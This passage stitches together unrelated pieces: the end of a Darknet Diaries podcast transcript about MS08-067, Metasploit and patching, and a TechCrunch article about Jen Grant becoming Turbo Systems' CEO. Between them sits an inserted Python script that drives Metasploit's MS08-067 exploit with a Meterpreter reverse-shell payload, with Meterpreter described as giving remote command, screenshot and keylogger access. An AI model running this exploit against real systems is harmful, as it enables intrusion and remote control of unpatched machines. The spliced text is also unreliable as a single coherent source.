You can do all that and more. Metasploit is an amazing hacker tool, a standard for any hacker to know how to use today. And the best part about Metasploit is that it’s free and open source. Anyone can grab it, study a few commands, and have over a thousand exploits ready at their fingertips. It’s really powerful and fun to play with, and if you attend any ethical hacking training, chances are you’ll be given Metasploit and a system vulnerable to MS08-067 as one of the first hacks you’ll do with it, because it’s pretty easy and you can see how effective Metasploit can be. So, because of that, penetration testers all over the world are very familiar with MS08-067 and all have that number memorized. However, it’s now 2020, so MS08-067 is a dozen years old, which means there are far fewer computers running Windows XP or that are vulnerable to this attack. So this bug is losing its notoriety. It’s much more rare to find a system vulnerable to this today, but they do exist.
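As a rough sketch of the workflow Jack describes, here is what those steps can look like when driven from Python with the third-party pymetasploit3 RPC client, rather than typed into the Metasploit console. This assumes msfrpcd is already running, that you only target a lab VM you own, and note that the target option name (RHOSTS vs. RHOST) varies across Metasploit versions.

```python
# Sketch of the MS08-067 Metasploit workflow described above, driven via
# the third-party pymetasploit3 RPC client. Lab use only, on machines you
# own; assumes msfrpcd is already running with this password.
from pymetasploit3.msfrpc import MsfRpcClient

client = MsfRpcClient("yourpassword")  # password chosen when starting msfrpcd

# Pick the MS08-067 exploit module.
exploit = client.modules.use("exploit", "windows/smb/ms08_067_netapi")
exploit["RHOSTS"] = "192.168.56.101"  # the unpatched Windows XP lab VM
                                      # (older Metasploit calls this RHOST)

# Pair it with a Meterpreter payload that connects back to us.
payload = client.modules.use("payload", "windows/meterpreter/reverse_tcp")
payload["LHOST"] = "192.168.56.1"     # our attacking machine

# The equivalent of typing "run" in msfconsole.
exploit.execute(payload=payload)
```

From there, a Meterpreter session gives you the run-any-command, screenshot, and keylogger capabilities described above.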

This story is another example of why it’s so important to update your software as soon as you can. However, it’s not always that easy. Some networks have very strict controls, like they can’t patch because a patch might break everything. The applications and software running on the computers don’t always work with the latest OS updates applied, and this quickly becomes a nightmare. I recently updated my home computer and a lot of the software I was running stopped working, so I had to wait for each application maker to put out an update for me to be back up and working again. Something like this is totally unacceptable in critical networks like hospitals or power plants, so it’s not always as simple as just patching. Like I was saying at the beginning, it’s a lot of different people’s jobs to keep our networks secure. In this case, Microsoft did their job of finding the bug and issuing a patch for it. And now that fix needs to trickle all the way down to everyone’s computers, because being on the most up-to-date version is like giving yourself a vaccination against the known attacks in the world. Updating your apps, operating systems and programs is, in my opinion, the single most effective thing you can do to protect yourself on the internet today.

A big thank you to John Lambert from Microsoft for coming on the show and sharing this story with us. I found it to be really cool. Also, if you want to know more about Conficker, check out the book Worm by Mark Bowden. It goes into a lot of detail about it. Hey, if you’re all caught up with this podcast and want more episodes, check out the Darknet Diaries Patreon page; you can find bonus episodes there. The show is made by me, the cyber ghost, Jack Rhysider. Music in this episode was special: typically I grab songs from all over, but in this one, every single song was created by the top talented Breakmaster Cylinder. And even though hoodies go up and drawstrings get pulled tight every time I see it, this is Darknet Diaries.

Turbo Systems hires former Looker CMO Jen Grant as CEO

Turbo Systems, a three-year-old no-code mobile app startup, announced today it has brought on industry veteran Jen Grant to be CEO.

Grant, who was previously vice president of marketing at Box and chief marketing officer at Elastic and Looker, brings more than 15 years of tech company experience to the young startup.

She says that when Looker got acquired by Google last June for $2.6 billion, she began looking for her next opportunity. She had done a stint with Google as a product manager earlier in her career and was looking for something new.

She saw Looker as a model for the kind of company she wanted to join, one that had a founder focused on product and engineering, who hired an outside CEO early on to run the business, as Looker had done. She found that in Turbo where founder Hari Subramanian was taking on that type of role. Subramanian was also a successful entrepreneur, having previously founded ServiceMax before selling it to GE in 2016.

“The first thing that really drew me to Turbo was this partnership with Hari,” Grant told TechCrunch. While that relationship was a key component for her, she says even with that, before she decided to join, she spoke to customers and she saw an enthusiasm there that drew her to the company.

“I love products that actually help people. And so Box is helping people collaborate and share files and work together. Looker is about getting data to everyone in the organization so that everyone could be making great decisions, and at Turbo we’re making it easy for anyone to create a mobile app that helps run their business,” she said.

Grant has been on the job for just 30 days, joining the company in the middle of a global pandemic. So it’s even more challenging than the typical early days for any new CEO, but she is looking forward and trying to help her 36 employees navigate this situation.

“You know, I didn’t know that this is what would happen in my first 30 days, but what inspires me, what’s a big part of it is that I can help by growing this company, by being successful and by being able to hire more and more people, and contribute to getting our economy back on track,” Grant said.

She also recognizes that there is a lack of diversity in her new CEO role, and she hopes to be a role model. “I have been fortunate to get to a position where I know I can do this job and do it well. And it’s my responsibility to do this work, my responsibility to show it can be done and shouldn’t be an anomaly.”

Turbo Systems was founded in 2017 and has raised $8 million, according to Crunchbase. It helps companies build mobile apps without coding, connecting to 140 different data sources such as Salesforce, SAP and Oracle.